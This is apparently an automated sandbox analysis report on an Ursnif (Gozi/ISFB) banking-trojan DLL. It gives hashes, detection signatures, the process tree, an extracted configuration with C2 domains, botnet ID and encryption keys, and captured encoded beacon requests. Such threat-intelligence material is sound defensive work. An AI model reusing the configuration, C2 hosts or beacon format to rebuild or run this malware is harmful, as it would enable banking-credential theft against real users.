Windows Analysis Report m87xfb63XU.dll

Overview

General Information

Sample Name: m87xfb63XU.dll
Analysis ID: 500399
MD5: 5aa733e108f0fa41df88cea0a309affe
SHA1: ce79918ca7845f2163360ea40a251912998ea226
SHA256: 1be687a0453f23ea53b94a4447c926a9b4b6e01c2788e641b76eb4a5215bd960
Tags: BRT, dll, geo, Gozi, ISFB, ITA, Ursnif
Detection

Ursnif
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Writes or reads registry keys via WMI
Writes registry values via WMI
Uses 32bit PE files
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6316 cmdline: loaddll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 4524 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 4536 cmdline: rundll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4668 cmdline: rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,BeGrass MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 4400 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 632 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 4596 cmdline: rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,Fieldeight MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 4792 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 640 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 4348 cmdline: rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,Often MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 6964 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 640 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "UmEkthy8LQToWYBqtBaWyLn/P1d2KjpXi9nl2is1X7NEi7AW4Al92U7HvBiCwWHgXhs6UyTZ7q6npv3YCi+rPS7xAyorWWgcyyviEpE9CETDXviZ72XZkxmen4ztvEtct+obFAEe0tiXOsfOcC8xDsI0CHPpvmUknsexTYqAJgwcghgx1mGHx/yFM4fnPYw4mFFE6bVI7eMnbu1CuunRmAVRDHZ7MAS7zSkAmYjeo1zAzRnOEWgblRHwenmwlBtp0SFGuYCGVe3TZZ4Nndgpd5xpSeLOoSZi/fRXjtS8b6LXBS/zslRCRObMDjDX4pa1fM1uOgFHyvjANgWJpZ272bpOHjM52/hsEGZXskaNztU=", "c2_domain": ["msn.com/mail", "breuranel.website", "outlook.com/signup", "areuranel.website"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000003.527111263.0000000003B28000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000000.00000003.527630553.0000000003B28000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000000.00000003.615631858.00000000038AD000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.531230770.00000000055A8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.531464419.00000000055A8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
(28 entries in total; the first 5 are shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
3.2.rundll32.exe.2eb0000.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
0.2.loaddll32.exe.3030000.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
0.2.loaddll32.exe.35794a0.1.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
3.2.rundll32.exe.6e710000.2.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
0.2.loaddll32.exe.6e710000.2.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
(13 entries in total; the first 5 are shown)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000003.00000003.454711091.0000000002E70000.00000040.00000001.sdmp  Malware Configuration Extractor: Ursnif (same configuration as listed in the Malware Configuration section above)
Multi AV Scanner detection for submitted file
Source: m87xfb63XU.dll  Virustotal: Detection: 18%
Source: m87xfb63XU.dll  ReversingLabs: Detection: 22%
Multi AV Scanner detection for domain / URL
Source: areuranel.website  Virustotal: Detection: 6%
Source: breuranel.website  Virustotal: Detection: 6%
Source: m87xfb63XU.dll  Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: m87xfb63XU.dll  Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\wheel\receive\Many-rise\score.pdb  source: loaddll32.exe, 00000000.00000002.697038895.000000006E78B000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.698211502.000000006E78B000.00000002.00020000.sdmp, m87xfb63XU.dll

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe  Domain query: www.msn.com
Source: C:\Windows\SysWOW64\rundll32.exe  Domain query: areuranel.website
Source: C:\Windows\SysWOW64\rundll32.exe  Domain query: breuranel.website
Source: C:\Windows\SysWOW64\rundll32.exe  Network Connect: 40.101.60.226 187
Source: C:\Windows\SysWOW64\rundll32.exe  Domain query: outlook.office365.com
Source: C:\Windows\SysWOW64\rundll32.exe  Network Connect: 52.97.135.82 187
Source: C:\Windows\SysWOW64\rundll32.exe  Domain query: msn.com
Source: C:\Windows\SysWOW64\rundll32.exe  Domain query: outlook.com
Source: C:\Windows\SysWOW64\rundll32.exe  Domain query: www.outlook.com
Source: C:\Windows\SysWOW64\rundll32.exe  Network Connect: 40.97.153.146 187
Source: C:\Windows\SysWOW64\rundll32.exe  Network Connect: 13.82.28.61 187
Source: Joe Sandbox View  ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS
Source: Joe Sandbox View  JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox View  IP Address: 40.97.153.146
Source: Joe Sandbox View  IP Address: 13.82.28.61
Source: global traffic  HTTP traffic detected: GET /mail/liopolo/881KeBhik38/n4I3jisQrsLf3N/5T7WW0TVyqLiEqrYpioXw/gsBY_2B0auYDQzqy/fq_2B0_2B1d5s1X/dE8U_2Bi9e1uHEa_2F/5gbQOA71j/4SGjjTuSnP5G5SL6XFKB/ya3reo77Dd0XJ5txbLh/Z2Jzwc_2FxPLynamqWy_2B/SzxjiUxPyCdZ8/5vaLjUU_/2FbRmdxDVJSYut_2BRUXs8y/S.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: msn.com
Source: global traffic  HTTP traffic detected: GET /mail/liopolo/I2vyCwQZ_2BZdOw7_2FC5/QHqYyNs8nTjA1r7w/N6UkSzFGkH0f_2F/1IQh_2Bz24bnmMcZ4_/2BpWpgK6a/MfYXdR3sp4DYLa3d1zd1/q_2BesRlkaXfNl4zUpH/oAvtXyz6Z7BEsY_2FVEEFG/s2tbS3iXa95no/TNlgDymJ/mAsry_2BV2k9xkYk3dzUg9O/zullnql4G3/M32YonxJQXyLafjIm/_2FKjkdabgYHJ/uSKzerPj.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: msn.com
Source: global traffic  HTTP traffic detected: GET /signup/liopolo/Lf_2Fg8f5c_2BK6/Zu9U0t2ZcTswwewFAO/OEv2PKFbN/z8b4kNhG7zvHccOv8idc/Knnm9TAFaDWeAkZRt7S/s_2FJY_2FJZ_2FiFjgDZcG/X_2FPaS4UIfT5/mU_2B6qd/RThDpvlqtg_2B_2FquXT6Oc/rU7JT5JO40/2bdRvqEsO2i_2Fk7a/RPdp6h9XEAxz/UCoD0GwK5aa/_2BLPCSSipSRAr/lNUH_2BVSP8NW1a0oO1V8/mPc3sf.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: outlook.com
Source: global traffic  HTTP traffic detected: GET /signup/liopolo/Lf_2Fg8f5c_2BK6/Zu9U0t2ZcTswwewFAO/OEv2PKFbN/z8b4kNhG7zvHccOv8idc/Knnm9TAFaDWeAkZRt7S/s_2FJY_2FJZ_2FiFjgDZcG/X_2FPaS4UIfT5/mU_2B6qd/RThDpvlqtg_2B_2FquXT6Oc/rU7JT5JO40/2bdRvqEsO2i_2Fk7a/RPdp6h9XEAxz/UCoD0GwK5aa/_2BLPCSSipSRAr/lNUH_2BVSP8NW1a0oO1V8/mPc3sf.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: www.outlook.com
Source: global traffic  HTTP traffic detected: GET /signup/liopolo/Lf_2Fg8f5c_2BK6/Zu9U0t2ZcTswwewFAO/OEv2PKFbN/z8b4kNhG7zvHccOv8idc/Knnm9TAFaDWeAkZRt7S/s_2FJY_2FJZ_2FiFjgDZcG/X_2FPaS4UIfT5/mU_2B6qd/RThDpvlqtg_2B_2FquXT6Oc/rU7JT5JO40/2bdRvqEsO2i_2Fk7a/RPdp6h9XEAxz/UCoD0GwK5aa/_2BLPCSSipSRAr/lNUH_2BVSP8NW1a0oO1V8/mPc3sf.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: outlook.office365.com
Source: global traffic  HTTP traffic detected: GET /signup/liopolo/tu_2FZBOhZEm_2BjC/Eeo1dbfGyNRA/5gxX_2BPT_2/FeU0eiO3g8_2Bd/o4ft4FEXI0SSJqvx69bYX/i59sx_2FafiNLas1/YucQw3tAlQFb4zA/iKo5z_2FddgGxYO4HP/KUIXOky8_/2FKdBAX0DuXXgI2ZfYY9/kP9v63o8avKNpLR1Vuu/u_2F4VkGFpqAysszotqEDO/434zYCc87r2Kg/mFe.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: outlook.com
Source: global traffic  HTTP traffic detected: GET /signup/liopolo/tu_2FZBOhZEm_2BjC/Eeo1dbfGyNRA/5gxX_2BPT_2/FeU0eiO3g8_2Bd/o4ft4FEXI0SSJqvx69bYX/i59sx_2FafiNLas1/YucQw3tAlQFb4zA/iKo5z_2FddgGxYO4HP/KUIXOky8_/2FKdBAX0DuXXgI2ZfYY9/kP9v63o8avKNpLR1Vuu/u_2F4VkGFpqAysszotqEDO/434zYCc87r2Kg/mFe.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: www.outlook.com
Source: global traffic  HTTP traffic detected: GET /signup/liopolo/tu_2FZBOhZEm_2BjC/Eeo1dbfGyNRA/5gxX_2BPT_2/FeU0eiO3g8_2Bd/o4ft4FEXI0SSJqvx69bYX/i59sx_2FafiNLas1/YucQw3tAlQFb4zA/iKo5z_2FddgGxYO4HP/KUIXOky8_/2FKdBAX0DuXXgI2ZfYY9/kP9v63o8avKNpLR1Vuu/u_2F4VkGFpqAysszotqEDO/434zYCc87r2Kg/mFe.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: outlook.office365.com
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1245Content-Type: text/htmlServer: Microsoft-IIS/10.0request-id: 6f408bdb-1e4d-c6ec-fa40-6761089e1892Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-CalculatedFETarget: DB9PR05CU001.internal.outlook.comX-BackEndHttpStatus: 404X-FEProxyInfo: DB9PR05CA0008.EURPRD05.PROD.OUTLOOK.COMX-CalculatedBETarget: DB8P195MB0662.EURP195.PROD.OUTLOOK.COMX-BackEndHttpStatus: 404X-RUM-Validated: 1X-Proxy-RoutingCorrectness: 1X-Proxy-BackendServerStatus: 404MS-CV: 24tAb00e7Mb6QGdhCJ4Ykg.1.1X-FEServer: DB9PR05CA0008X-Powered-By: ASP.NETX-FEServer: AM6P195CA0054Date: Mon, 11 Oct 2021 22:37:50 GMTConnection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1245Content-Type: text/htmlServer: Microsoft-IIS/10.0request-id: 0ad922d7-711b-417c-0004-37a25225c4eaStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-CalculatedFETarget: DU2PR04CU012.internal.outlook.comX-BackEndHttpStatus: 404X-FEProxyInfo: DU2PR04CA0336.EURPRD04.PROD.OUTLOOK.COMX-CalculatedBETarget: DB7P194MB0346.EURP194.PROD.OUTLOOK.COMX-BackEndHttpStatus: 404X-RUM-Validated: 1X-Proxy-RoutingCorrectness: 1X-Proxy-BackendServerStatus: 404MS-CV: 1yLZChtxfEEABDeiUiXE6g.1.1X-FEServer: DU2PR04CA0336X-Powered-By: ASP.NETX-FEServer: AM5P194CA0019Date: Mon, 11 Oct 2021 22:37:54 GMTConnection: close
                      Source: WerFault.exe, 0000000D.00000002.542863916.00000000052E4000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000002.555554795.0000000004A95000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.566895044.0000000004E23000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: loaddll32.exe, 00000000.00000003.527597302.0000000003AA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.531625301.0000000005529000.00000004.00000040.sdmpString found in binary or memory: http://ogp.me/ns#
                      Source: loaddll32.exe, 00000000.00000003.527597302.0000000003AA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.531625301.0000000005529000.00000004.00000040.sdmpString found in binary or memory: http://ogp.me/ns/fb#
                      Source: loaddll32.exe, 00000000.00000003.527111263.0000000003B28000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.531230770.00000000055A8000.00000004.00000040.sdmpString found in binary or memory: https://blogs.msn.com/
                      Source: loaddll32.exe, 00000000.00000003.527111263.0000000003B28000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.531809993.00000000055AB000.00000004.00000040.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                      Source: loaddll32.exe, 00000000.00000003.527597302.0000000003AA9000.00000004.00000040.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1633991829&rver
                      Source: rundll32.exe, 00000003.00000003.531625301.0000000005529000.00000004.00000040.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1633991831&rver
                      Source: loaddll32.exe, 00000000.00000003.527597302.0000000003AA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.531625301.0000000005529000.00000004.00000040.sdmpString found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&market=en-us"
                      Source: loaddll32.exe, 00000000.00000003.527597302.0000000003AA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.531625301.0000000005529000.00000004.00000040.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/en-us//api/modules/cdnfetch"
                      Source: loaddll32.exe, 00000000.00000003.527597302.0000000003AA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.531625301.0000000005529000.00000004.00000040.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/en-us/homepage/_sc/css/d7cb56b9-3a82770e/direct
                      Source: WerFault.exe, 00000013.00000003.567391017.0000000004E8D000.00000004.00000001.sdmpString found in binary or memory: https://watson.telemetry.m
                      Source: loaddll32.exe, 00000000.00000003.527597302.0000000003AA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.531625301.0000000005529000.00000004.00000040.sdmpString found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a
                      Source: loaddll32.exe, 00000000.00000003.527597302.0000000003AA9000.00000004.00000040.sdmpString found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2f881KeBhik38%2fn4I3jisQrsLf3N%2f5T7WW0TVyqLiEqrYpioXw
                      Source: rundll32.exe, 00000003.00000003.531625301.0000000005529000.00000004.00000040.sdmpString found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2fI2vyCwQZ_2BZdOw7_2FC5%2fQHqYyNs8nTjA1r7w%2fN6UkSzFGk
                      Source: loaddll32.exe, 00000000.00000003.527597302.0000000003AA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.531625301.0000000005529000.00000004.00000040.sdmpString found in binary or memory: https://www.msn.com/en-us//api/modules/fetch"
                      Source: unknownDNS traffic detected: queries for: msn.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/881KeBhik38/n4I3jisQrsLf3N/5T7WW0TVyqLiEqrYpioXw/gsBY_2B0auYDQzqy/fq_2B0_2B1d5s1X/dE8U_2Bi9e1uHEa_2F/5gbQOA71j/4SGjjTuSnP5G5SL6XFKB/ya3reo77Dd0XJ5txbLh/Z2Jzwc_2FxPLynamqWy_2B/SzxjiUxPyCdZ8/5vaLjUU_/2FbRmdxDVJSYut_2BRUXs8y/S.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/I2vyCwQZ_2BZdOw7_2FC5/QHqYyNs8nTjA1r7w/N6UkSzFGkH0f_2F/1IQh_2Bz24bnmMcZ4_/2BpWpgK6a/MfYXdR3sp4DYLa3d1zd1/q_2BesRlkaXfNl4zUpH/oAvtXyz6Z7BEsY_2FVEEFG/s2tbS3iXa95no/TNlgDymJ/mAsry_2BV2k9xkYk3dzUg9O/zullnql4G3/M32YonxJQXyLafjIm/_2FKjkdabgYHJ/uSKzerPj.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/Lf_2Fg8f5c_2BK6/Zu9U0t2ZcTswwewFAO/OEv2PKFbN/z8b4kNhG7zvHccOv8idc/Knnm9TAFaDWeAkZRt7S/s_2FJY_2FJZ_2FiFjgDZcG/X_2FPaS4UIfT5/mU_2B6qd/RThDpvlqtg_2B_2FquXT6Oc/rU7JT5JO40/2bdRvqEsO2i_2Fk7a/RPdp6h9XEAxz/UCoD0GwK5aa/_2BLPCSSipSRAr/lNUH_2BVSP8NW1a0oO1V8/mPc3sf.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/Lf_2Fg8f5c_2BK6/Zu9U0t2ZcTswwewFAO/OEv2PKFbN/z8b4kNhG7zvHccOv8idc/Knnm9TAFaDWeAkZRt7S/s_2FJY_2FJZ_2FiFjgDZcG/X_2FPaS4UIfT5/mU_2B6qd/RThDpvlqtg_2B_2FquXT6Oc/rU7JT5JO40/2bdRvqEsO2i_2Fk7a/RPdp6h9XEAxz/UCoD0GwK5aa/_2BLPCSSipSRAr/lNUH_2BVSP8NW1a0oO1V8/mPc3sf.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/Lf_2Fg8f5c_2BK6/Zu9U0t2ZcTswwewFAO/OEv2PKFbN/z8b4kNhG7zvHccOv8idc/Knnm9TAFaDWeAkZRt7S/s_2FJY_2FJZ_2FiFjgDZcG/X_2FPaS4UIfT5/mU_2B6qd/RThDpvlqtg_2B_2FquXT6Oc/rU7JT5JO40/2bdRvqEsO2i_2Fk7a/RPdp6h9XEAxz/UCoD0GwK5aa/_2BLPCSSipSRAr/lNUH_2BVSP8NW1a0oO1V8/mPc3sf.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/tu_2FZBOhZEm_2BjC/Eeo1dbfGyNRA/5gxX_2BPT_2/FeU0eiO3g8_2Bd/o4ft4FEXI0SSJqvx69bYX/i59sx_2FafiNLas1/YucQw3tAlQFb4zA/iKo5z_2FddgGxYO4HP/KUIXOky8_/2FKdBAX0DuXXgI2ZfYY9/kP9v63o8avKNpLR1Vuu/u_2F4VkGFpqAysszotqEDO/434zYCc87r2Kg/mFe.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/tu_2FZBOhZEm_2BjC/Eeo1dbfGyNRA/5gxX_2BPT_2/FeU0eiO3g8_2Bd/o4ft4FEXI0SSJqvx69bYX/i59sx_2FafiNLas1/YucQw3tAlQFb4zA/iKo5z_2FddgGxYO4HP/KUIXOky8_/2FKdBAX0DuXXgI2ZfYY9/kP9v63o8avKNpLR1Vuu/u_2F4VkGFpqAysszotqEDO/434zYCc87r2Kg/mFe.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/tu_2FZBOhZEm_2BjC/Eeo1dbfGyNRA/5gxX_2BPT_2/FeU0eiO3g8_2Bd/o4ft4FEXI0SSJqvx69bYX/i59sx_2FafiNLas1/YucQw3tAlQFb4zA/iKo5z_2FddgGxYO4HP/KUIXOky8_/2FKdBAX0DuXXgI2ZfYY9/kP9v63o8avKNpLR1Vuu/u_2F4VkGFpqAysszotqEDO/434zYCc87r2Kg/mFe.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.3:49754 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.3:49756 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.153.146:443 -> 192.168.2.3:49784 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.223.66:443 -> 192.168.2.3:49785 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.151.2:443 -> 192.168.2.3:49786 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.153.146:443 -> 192.168.2.3:49787 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.135.82:443 -> 192.168.2.3:49788 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.101.60.226:443 -> 192.168.2.3:49789 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000000.00000003.527111263.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.527630553.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.615631858.00000000038AD000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531230770.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531464419.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.527327468.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.576012668.000000000542B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531480606.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.527187841.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.659429998.00000000037AF000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531370717.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.527048423.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531284421.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531412078.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531686708.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531172047.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.570679066.00000000039AB000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.624467221.000000000532D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.667937639.000000000522F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.526903678.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531440376.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.527256439.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.526968624.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.527017763.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6316, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4536, type: MEMORYSTR
                      Source: Yara matchFile source: 3.2.rundll32.exe.2eb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.3030000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.35794a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e710000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e710000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2dca31a.0.raw.unpack, type: UNPACKEDPE
